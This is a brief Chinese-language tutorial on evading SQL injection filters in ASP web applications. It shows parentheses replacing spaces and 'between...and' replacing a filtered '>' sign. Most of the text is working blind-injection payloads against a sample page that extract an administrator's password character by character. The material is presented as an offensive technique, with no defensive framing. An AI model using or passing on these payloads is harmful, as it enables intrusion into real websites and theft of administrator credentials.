對于SQL語句,大家還都習慣于其的空格,比如select id from [name],如果中間沒有了空格,那就成了selectidfrom[name], 一灘糊涂!除了上面所說到幾個空格的替代方法外,我發現用()括號在SQL中一樣可以運行,比如上面的語句,就可以寫成,select(id)from[name],有括號分隔,可以正常執行。 舉個例 子說一下,我們得到一個注入點:jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢管理員的密碼的語句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實可以寫成這樣的: jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''=' 如果屏蔽了和>符號,則用between…and…,語句是: jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='
